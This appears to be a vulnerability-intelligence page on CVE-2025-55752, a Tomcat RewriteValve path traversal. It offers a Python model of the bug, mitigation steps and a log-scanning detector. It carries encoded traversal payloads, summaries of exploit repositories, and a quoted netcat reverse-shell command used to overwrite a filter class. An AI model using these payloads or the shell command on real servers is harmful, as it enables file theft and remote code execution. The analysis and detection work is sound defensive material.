Relative Path Traversal in Apache Tomcat RewriteValve
CVE-2025-55752 is a relative path traversal vulnerability in Apache Tomcat's RewriteValve. The fix for bug 60013 introduced a regression: a rewritten URL was normalized before it was decoded. In configurations whose rewrite rules copy a query parameter into the URL path, an attacker can therefore put percent-encoded traversal sequences (for example a percent-encoded '..') into that parameter; normalization sees only ordinary-looking segments, the /WEB-INF/ and /META-INF/ constraint is enforced on that harmless-looking path, and the real '..' segments only appear once the path is decoded. The result bypasses Tomcat's security constraints for /WEB-INF/ and /META-INF/, and where HTTP PUT is enabled it also allows files to be written into those directories, which can lead to remote code execution. Affected versions are Apache Tomcat 11.0.0-M1 through 11.0.10, 10.1.0-M1 through 10.1.44, and 9.0.0.M11 through 9.0.108; the fix shipped in 11.0.11, 10.1.45 and 9.0.109. The end-of-life 8.5.6 through 8.5.100 releases are also known to be affected, and older EOL versions may be affected as well.
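To make that ordering bug concrete, here is a small Python model of the pre-fix and post-fix pipelines. It is an added example for this page, not Tomcat's code and not taken from any of the PoC repositories. It borrows the rewrite rule described in the first exploit summary below (/page?p=<id> becomes /bcfa797d7c61df63/blog_%1.html); the function names, the toy normalizer and the constraint check are assumptions that stand in for the corresponding Tomcat logic. It also shows the rule-level hardening a practitioner would apply: a capture group that cannot match '/', '.', ';' or '%'.

```python
import posixpath
import re
from urllib.parse import unquote

# Directories whose contents Tomcat must never serve directly.
PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")

# Modelled on the PoC's rule: /page?p=<id> becomes /bcfa797d7c61df63/blog_<id>.html.
# RewriteValve's %{QUERY_STRING} is the raw, still percent-encoded query string,
# so <id> is spliced into the path undecoded.
RULE_PATH = "/page"
TEMPLATE = "/bcfa797d7c61df63/blog_%1.html"
LOOSE_P = re.compile(r"(?:^|&)p=([^&]*)")                    # the PoC's permissive capture
STRICT_P = re.compile(r"(?:^|&)p=([A-Za-z0-9_-]+)(?:&|$)")   # hardened: no '/', '.', ';', '%'


def rewrite(path, raw_query, capture=LOOSE_P):
    """Apply the toy rule; requests it does not match pass through unchanged."""
    if path != RULE_PATH:
        return path
    m = capture.search(raw_query)
    if m is None:
        return path
    return TEMPLATE.replace("%1", m.group(1))


def normalize(path):
    """Collapse '.' and '..' segments; None when '..' would climb above the root
    (which Tomcat rejects). Only a literal '..' is recognised: a percent-encoded
    '%2e%2e' is just an ordinary segment name at this stage."""
    out = []
    for seg in path.split("/")[1:]:
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                return None
            out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def is_protected(path):
    """The constraint the CVE bypasses: no direct access below WEB-INF or META-INF."""
    upper = path.upper()
    return any(upper.startswith(prefix) for prefix in PROTECTED_PREFIXES)


def strip_path_params(path):
    """Tomcat treats ';...' inside a segment as path parameters and drops them.
    The PoC's trailing ';' relies on this: 'ChumyFilter.class;.html' ends up as
    'ChumyFilter.class', shedding the suffix the rewrite template appends."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def vulnerable_pipeline(path, raw_query):
    """Pre-fix order (the regression from the bug 60013 fix): normalize the
    still-encoded rewritten URL, enforce the constraint on it, then decode.
    Returns the URI handed downstream, or None when the request is blocked."""
    normalized = normalize(rewrite(path, raw_query))
    if normalized is None or is_protected(normalized):
        return None
    return unquote(normalized)  # encoded dot segments reappear here, unchecked


def fixed_pipeline(path, raw_query, capture=LOOSE_P):
    """Fixed order: drop path parameters, decode, normalize, then check."""
    decoded = unquote(strip_path_params(rewrite(path, raw_query, capture)))
    normalized = normalize(decoded)
    if normalized is None or is_protected(normalized):
        return None
    return normalized


def served_resource(uri):
    """What the resource layer finally resolves a decoded URI to: path
    parameters dropped and dot segments collapsed."""
    return posixpath.normpath(strip_path_params(uri))


if __name__ == "__main__":
    for query in ("p=42", "p=/../../WEB-INF/web.xml;", "p=/%2e%2e/%2e%2e/WEB-INF/web.xml;"):
        v = vulnerable_pipeline("/page", query)
        print(query, "->", "blocked" if v is None else served_resource(v),
              "| fixed:", fixed_pipeline("/page", query) or "blocked",
              "| strict rule:", fixed_pipeline("/page", query, STRICT_P))
```

The plain `/../../` payload is caught in both orders because the normalizer sees literal dots. The `%2e%2e` payload passes the vulnerable order untouched, is decoded afterwards, and resolves to /WEB-INF/web.xml downstream; the fixed order decodes first and blocks it. With the strict capture the traversal value never matches the rule at all, so the request is simply not rewritten.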
Impact, mitigation & remediation
Impact: on an affected Tomcat with a rewrite rule that copies a query parameter into the path, an attacker can make the rewritten request resolve below /WEB-INF/ or /META-INF/ and read what those directories are supposed to hide (web.xml, compiled classes, MANIFEST.MF, and any credentials they contain). If HTTP PUT is also enabled, the same traversal writes into those directories, and dropping a JSP or replacing a deployed class turns the flaw into remote code execution, as the exploit repositories below demonstrate.
Mitigation (if you can't patch tonight): confirm PUT is disabled, which means the DefaultServlet's readonly init parameter is left at its default of true; audit rewrite.config for RewriteCond/RewriteRule pairs that copy %{QUERY_STRING} captures into a path and tighten the capture groups so that '/', '.', ';' and '%' cannot appear in the captured value; if a rule cannot be tightened, disable it until you have upgraded.
Remediation: upgrade to Apache Tomcat 11.0.11, 10.1.45 or 9.0.109 or later (8.5.x is end of life and should be moved to a supported branch), then assume compromise: look in /WEB-INF/ and /META-INF/ of every webapp for files and classes you did not deploy, search access logs for PUT requests and for encoded dot segments or ';' in query strings, and rotate any secret that could have been read from web.xml or context configuration.
Exploits
3 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
Repository is a self-contained PoC environment (Dockerized Tomcat + sample JSP app) plus an exploit script for CVE-2025-55752-style Tomcat RewriteValve path traversal leading to arbitrary file write and RCE.
Structure and purpose:
- app/ (vulnerable demo container)
- Dockerfile: builds a Tomcat 11.0.10 image, installs netcat, deploys the ROOT webapp, enables RewriteValve via server.xml, and compiles a benign Filter (meow.ChumyFilter) into WEB-INF/classes.
- src/ROOT/index.jsp: simple blog UI that issues PUT requests to /page?p=<id> with an HTML body and lists the stored blog_*.html files from /bcfa797d7c61df63.
- src/ROOT/WEB-INF/rewrite.config: RewriteValve rules. The key rule takes query parameter p and rewrites /page to /bcfa797d7c61df63/blog_%1.html. The capture regex allows arbitrary characters in p (it excludes neither '/' nor '..'), which is what enables traversal once the value is URL-encoded.
- src/ROOT/WEB-INF/web.xml + classes/meow/ChumyFilter.java: registers a Filter on /*. In the demo it only sets a response header ("Power-By: Chumy").
- src/server.xml: Tomcat config with RewriteValve enabled for the ROOT context.
- docker-compose.yml: exposes 8080 and mounts ./flag into the container at /f14g1337 (read-only).
- exploit.sh: weaponizes the arbitrary file write by compiling a malicious replacement meow.ChumyFilter.class whose init() runs a netcat reverse shell (nc <ip> <port> -e /bin/bash). It uploads the class via HTTP PUT to /page with p set to an encoded traversal path targeting WEB-INF/classes/meow/ChumyFilter.class, with a trailing ';' (most likely so that the .html suffix appended by the rewrite rule becomes a path parameter that Tomcat strips, leaving the .class file name intact). It then starts a local nc listener to catch the shell.
Exploit capabilities:
- Remote arbitrary file write via a crafted PUT to /page with traversal in query parameter p.
- Remote code execution by overwriting a loaded servlet Filter class file and triggering class initialization, yielding a reverse shell.
Notable indicators:
- Network endpoint: /page (PUT) is the primary attack surface.
- File target: WEB-INF/classes/meow/ChumyFilter.class overwrite.
- Reverse shell: outbound TCP to attacker IP:port using netcat and /bin/bash.
- Fingerprint header: "Power-By: Chumy" set by the filter in normal operation.
This repository provides a proof-of-concept exploit for CVE-2025-55752, a directory traversal and potential remote code execution vulnerability in Apache Tomcat. The main file, CVE-2025-55752.py, is a Python script that can (1) check if a Tomcat server is vulnerable to path traversal into protected directories (like /WEB-INF/) and (2) attempt to upload a JSP payload via HTTP PUT, then verify if the upload is accessible using a normalization bypass (e.g., /..;/WEB-INF/shell.jsp). The script supports custom payloads and filenames. The README.md gives a detailed explanation of the vulnerability, affected versions, usage instructions, and mitigation recommendations. The requirements.txt lists necessary Python dependencies. The exploit targets Tomcat servers with specific vulnerable versions and configurations, and if successful, can lead to remote code execution by uploading and accessing a web shell in a protected directory.
This repository provides a comprehensive Docker-based environment to reproduce and exploit CVE-2025-55752, a path traversal vulnerability in Apache Tomcat's RewriteValve. The structure includes configuration files for Tomcat, a vulnerable web application, and both Python and Bash scripts for automated exploitation and testing. The main exploit script (docker/scripts/exploit.py) is a Python tool that tests a variety of path traversal payloads against a target Tomcat instance, attempting to read protected files such as /WEB-INF/web.xml and /META-INF/MANIFEST.MF. It also checks if the HTTP PUT method is enabled, which could allow remote code execution by uploading a malicious JSP webshell. The Bash script (docker/scripts/test_vulnerability.sh) automates similar tests using curl. The Tomcat configuration (docker/tomcat/conf/rewrite.config) sets up RewriteValve rules that are essential for triggering the vulnerability. The web application includes protected files and JSP handlers for demonstration and analysis. The exploit is operational: it provides working payloads and can confirm the vulnerability by reading protected files. If the PUT method is enabled, it can escalate to remote code execution. The repository is well-documented, with a README explaining the vulnerability, affected versions, exploitation steps, and mitigation advice. No fake or destructive code is present; the repository is a legitimate and practical exploit environment for CVE-2025-55752.
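The three summaries above give the same set of indicators: a PUT to a rewrite endpoint, percent-encoded dot segments in a query string, a '..;' segment, and any reference to WEB-INF or META-INF. The following Python script turns them into a check you can run over a Tomcat access log. It is an added example for this page, not code from any of the repositories; the sample log lines are constructed, and the regexes and function names are this example's own assumptions. It relies on Tomcat's default AccessLogValve pattern, whose %r field records the request line as the client sent it, before RewriteValve changed the path.

```python
import re
from urllib.parse import unquote

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b. %r is the
# request line as the client sent it, i.e. before RewriteValve touched it.
LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)
# '.', '/', '\' and ';' have no reason to be percent-encoded in a legitimate request.
ENCODED_STRUCTURAL = re.compile(r"%(?:2e|2f|5c|3b)", re.IGNORECASE)
# A '..' segment, including the '..;' form where a path parameter hides it.
DOT_DOT = re.compile(r"\.\.(?:[/;\\]|$)")
PROTECTED_DIR = re.compile(r"/(?:WEB-INF|META-INF)(?:/|$)", re.IGNORECASE)


def parse_access_line(line):
    """Split one access-log line into its fields, or None if it does not match."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def indicators(target):
    """Reasons a request target (path plus query) looks like a traversal attempt."""
    reasons = []
    if ENCODED_STRUCTURAL.search(target):
        reasons.append("encoded path character")
    decoded = unquote(target)  # one decode pass, like the server
    if DOT_DOT.search(decoded):
        reasons.append("dot-dot segment after decoding")
    if PROTECTED_DIR.search(decoded):
        reasons.append("targets WEB-INF or META-INF")
    return reasons


def scan(lines):
    """Return (line number, method, status, reasons) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        entry = parse_access_line(line)
        if entry is None:
            continue
        reasons = indicators(entry["target"])
        # A PUT whose target carries a query string is the shape of the
        # rewrite-based file write; flag it even if the traversal is hidden.
        if entry["method"] == "PUT" and "?" in entry["target"]:
            reasons.append("PUT with query string")
        if reasons:
            hits.append((number, entry["method"], entry["status"], reasons))
    return hits


# Constructed sample log lines (not real traffic): a normal rewrite hit, a
# read of web.xml through the encoded traversal, a PoC-style class overwrite
# via PUT, a '..;' fetch of an uploaded JSP, and an ordinary request.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Oct/2025:10:15:32 +0000] "GET /page?p=42 HTTP/1.1" 200 512
10.0.0.5 - - [21/Oct/2025:10:15:40 +0000] "GET /page?p=/%2e%2e/%2e%2e/WEB-INF/web.xml; HTTP/1.1" 200 1402
203.0.113.9 - - [21/Oct/2025:10:16:02 +0000] "PUT /page?p=/%2e%2e/%2e%2e/WEB-INF/classes/meow/ChumyFilter.class; HTTP/1.1" 201 -
203.0.113.9 - - [21/Oct/2025:10:16:05 +0000] "GET /..;/WEB-INF/shell.jsp HTTP/1.1" 200 87
10.0.0.7 - - [21/Oct/2025:10:17:11 +0000] "GET /docs/index.html HTTP/1.1" 200 2048
""".splitlines()

if __name__ == "__main__":
    for number, method, status, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {method} {status}: {', '.join(reasons)}")
```

A 200 or 201 on a flagged line is the case to triage first: it means the rewrite resolved and the protected resource was served or written. A 404 still tells you someone is probing, and the same request shapes are what to hand to a SIEM rule.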
Affected products & vendors
Apache Tomcat 11.0.x, 10.1.x and 9.0.x in the ranges listed above, plus the end-of-life 8.5.x releases. Products that bundle an affected Tomcat, such as SAP Commerce Cloud (see Recent activity), inherit the issue and need the vendor's updated build.
Recent activity
31 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Apache Tomcat as used by SAP Commerce Cloud is affected by CVE-2025-55752, putting the confidentiality, integrity, and availability of the application at high risk if unpatched.
A directory traversal vulnerability in Apache Tomcat that can lead to remote code execution if the PUT method is enabled, allowing attackers to potentially upload and execute arbitrary files.
A relative path traversal vulnerability in Apache Tomcat's RewriteValve caused by normalization of rewritten URLs before decoding, which can bypass security constraints protecting directories such as /WEB-INF/ and /META-INF/. In certain configurations with HTTP PUT enabled, it may allow malicious file upload and potentially remote code execution.
A relative path traversal flaw in Apache Tomcat that can bypass protected paths (e.g., /WEB-INF/, /META-INF/) and, if PUT is enabled, may enable malicious file upload leading to potential RCE.